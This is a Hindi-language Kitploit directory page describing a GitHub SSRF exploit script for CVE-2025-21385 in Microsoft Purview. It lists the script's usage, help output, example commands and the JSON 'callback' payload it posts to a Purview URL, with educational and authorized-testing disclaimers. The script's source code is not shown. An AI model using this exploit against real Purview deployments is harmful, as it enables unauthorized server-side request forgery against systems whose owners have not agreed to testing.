Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-21385 — Microsoft Purview में SSRF भेद्यता | Kitploit
उपकरण/GitHubGitHub/pauloxc6/cve-2025-21385
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubpauloxc6/cve-2025-21385

CVE-2025-21385

Microsoft Purview में SSRF भेद्यता

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SSRF एक्सप्लॉइट स्क्रिप्ट

इस रिपॉजिटरी में एक स्क्रिप्ट है जो SSRF (सर्वर-साइड रिक्वेस्ट फोर्जरी) एक्सप्लॉइट करने के लिए डिज़ाइन की गई है, जो परीक्षण और शैक्षिक उद्देश्यों के लिए है। इस उपकरण का जिम्मेदारी से उपयोग करें और केवल उन वातावरणों में जहाँ आपके पास स्पष्ट अनुमति हो।

विशेषताएँ

  • लक्ष्य प्रणालियों में SSRF कमजोरियों का शोषण करें।
  • दुरुपयोग से बचने के लिए इनपुट URL को मान्य करें।
  • स्पष्ट त्रुटि संदेशों और सहायता मेनू के साथ उपयोग में आसान CLI इंटरफ़ेस।

आवश्यकताएँ

  • bash (यूनिक्स शेल)
  • jq (JSON प्रोसेसर)
  • curl (HTTP अनुरोधों के लिए कमांड-लाइन टूल)

उपयोग

सिंटैक्स

root@kitploit:~
./script.sh --exploit <target_url> <purview_url>

विकल्प

विकल्पविवरण
-h, --helpसहायता मेनू दिखाएँ।
--exploit tu puलक्ष्य और पुरव्यू URL के साथ SSRF एक्सप्लॉइट करें।

उदाहरण

सहायता मेनू दिखाएँ

root@kitploit:~
./script.sh -h

आउटपुट:

root@kitploit:~
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs

SSRF एक्सप्लॉइट करें

root@kitploit:~
./script.sh --exploit http://example.com http://purview-url.com

अपेक्षित आउटपुट:

  • यदि सफल हो:
    root@kitploit:~
    SSRF exploit successful! Data retrieved:
    <response data>
    
  • यदि असफल हो:
    root@kitploit:~
    SSRF exploit failed! HTTP code: <code>
    

स्क्रिप्ट वर्कफ़्लो

  1. स्क्रिप्ट प्रदान किए गए तर्कों को पार्स करती है।
  2. प्रदान किए गए URL की शुद्धता के लिए मान्यता प्रदान करती है।
  3. purview_url पर JSON पेलोड के साथ एक HTTP POST अनुरोध भेजती है, SSRF कमजोरी का शोषण करने का प्रयास करती है।
  4. परिणाम के आधार पर HTTP प्रतिक्रिया या त्रुटि संदेश प्रिंट करती है।

उदाहरण वर्कफ़्लो

इनपुट

root@kitploit:~
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com

भेजा गया पेलोड

root@kitploit:~
{
  "callback": "http://callback-url.com"
}

प्रतिक्रिया हैंडलिंग

HTTP प्रतिक्रिया कोड और बॉडी सहेजे जाते हैं, और स्थिति कोड के आधार पर, एक्सप्लॉइट की सफलता या विफलता निर्धारित की जाती है।

त्रुटि हैंडलिंग

  • यदि अमान्य या गायब तर्क पाए जाते हैं, तो स्क्रिप्ट सहायता मेनू के माध्यम से विस्तृत निर्देश प्रदान करती है।
  • यदि URL गलत स्वरूप में हैं, तो एक त्रुटि संदेश प्रदर्शित होता है और निष्पादन रुक जाता है।

विकास नोट्स

यह स्क्रिप्ट केवल परीक्षण उद्देश्यों के लिए है। इस स्क्रिप्ट का दुरुपयोग गंभीर कानूनी परिणामों का कारण बन सकता है। सभी लागू कानूनों और नैतिक मानकों का पालन सुनिश्चित करें।

योगदान

पुल रिक्वेस्ट बनाकर या समस्याएं रिपोर्ट करके योगदान करने में संकोच न करें।

लाइसेंस

GNU GPL v3


अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। लेखक इस उपकरण के दुरुपयोग या किसी भी क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें